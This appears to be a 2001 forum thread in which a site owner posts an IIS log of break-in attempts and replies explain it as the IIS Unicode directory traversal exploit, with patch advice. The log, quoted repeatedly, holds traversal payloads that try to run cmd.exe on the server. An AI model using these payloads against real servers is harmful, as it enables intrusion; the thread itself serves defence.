Site Break IN

Savage · 06-23-2001, 04:04 PM

Below is the log file from someone trying to break in. What are they trying
to do.
Thanks For any help.
Savage

2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%9v../winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%qf../winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á../winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..o../winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
/c+dir 404 -
2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe
/c+dir 404 -

Matt Liotta · 06-23-2001, 07:11 PM

Execute arbitrary commands on your system. This is a known exploit for IIS.

-Matt

"Savage" <vondras@enteract.com> wrote in message
news:3b34f65c$1@news.devx.com...
>
> Below is the log file from someone trying to break in. What are they
trying
> to do.
> Thanks For any help.
> Savage
>
> 2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..Á%pc../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..À%9v../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..À%qf../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..Á%8s../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..Á../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..o../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..ð??¯../winnt/system32/cmd.exe
> /c+dir 404 -

Michael Howard · 06-27-2001, 05:59 PM

it's the unicode 'sploit.

"Savage" <vondras@enteract.com> wrote:
>
>Below is the log file from someone trying to break in. What are they trying
>to do.
>Thanks For any help.
>Savage
>
>2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%9v../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%qf../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..o../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe
>/c+dir 404 -

Eli Allen · 07-02-2001, 03:17 AM

No, its UTF-8

Eli Allen

"Michael Howard" <mikehow@microsoft.com> wrote in message
news:3b3a5749$1@news.devx.com...
>
> it's the unicode 'sploit.
>
>
> "Savage" <vondras@enteract.com> wrote:
> >
> >Below is the log file from someone trying to break in. What are they
trying
> >to do.
> >Thanks For any help.
> >Savage
> >
> >2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..Á%pc../winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..À%9v../winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..À%qf../winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..Á%8s../winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..Á../winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..o../winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET
/winnt/system32/cmd.exe
> >/c+dir 404 -
> >2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET
/scripts/..ð??¯../winnt/system32/cmd.exe
> >/c+dir 404 -
>

Stephen · 07-16-2001, 02:21 AM

This person obviously has read about the Unicode exploit in IIS4.0 and 5.0
and is trying it out on yout webserver. Only thing is, the exploit has many
possible forms owing to the different unicode tables available. Looks like
he/she is trying them out one by one, trying to see which one(s) work.

Go get the patch from microsoft.

If you cannot find it, let me know :-)

"Savage" <vondras@enteract.com> wrote:
>
>Below is the log file from someone trying to break in. What are they trying
>to do.
>Thanks For any help.
>Savage
>
>2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%9v../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%qf../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..o../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe
>/c+dir 404 -

Stephan Blanchard · 07-19-2001, 03:32 AM

The guy is just trying to see if there are any security holes in the web server.
if he successfully manages to execute cmd.exe he knows that there is a hole.

"Savage" <vondras@enteract.com> wrote:
>
>Below is the log file from someone trying to break in. What are they trying
>to do.
>Thanks For any help.
>Savage
>
>2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%9v../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%qf../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..o../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe
>/c+dir 404 -

VN · 08-08-2001, 02:31 AM

Looks like they are trying to get to your IIS server and finding out whether
the remote cmd invocation bug has been fixed on your server or not.

"Savage" <vondras@enteract.com> wrote:
>
>Below is the log file from someone trying to break in. What are they trying
>to do.
>Thanks For any help.
>Savage
>
>2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%9v../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%qf../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..o../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe
>/c+dir 404 -

olo bradshaw · 08-30-2001, 05:27 PM

Here is some information on the logs:

Date of attack : 06/21/2001 (mm/dd/yyyy)
Time of Attack : 10:18PM
Source Of Attack : 24.19.216.36
Destination Address Of Attack : 65.114.73.230
Destination Port Of Attack : 80
Attack Name : Microsoft IIS 5.0/4.0
UNICODE Vulnerability
Attack Description : The reported attack
uses a vulnerability
in Micrsoft IIS to
traverse directories
outside of the webroot
this allows an attacker
to gain anonyomous access
to the system running the
webserver.
Advisory Number (MICROSOFT) : Q269862
Date of Advisory : 08/26/2000 (mm/dd/yyyy)

Hope this helps just a little.
------o1o
"Savage" <vondras@enteract.com> wrote:
>
>Below is the log file from someone trying to break in. What are they trying
>to do.
>Thanks For any help.
>Savage
>
>2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%9v../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%qf../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..o../winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe
>/c+dir 404 -
>2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe
>/c+dir 404 -

Thread: Site Break IN

Thread Tools

Display

Site Break IN

Re: Site Break IN

Re: Site Break IN

Re: Site Break IN

Re: Site Break IN

Re: Site Break IN

Re: Site Break IN

Re: Site Break IN

Posting Permissions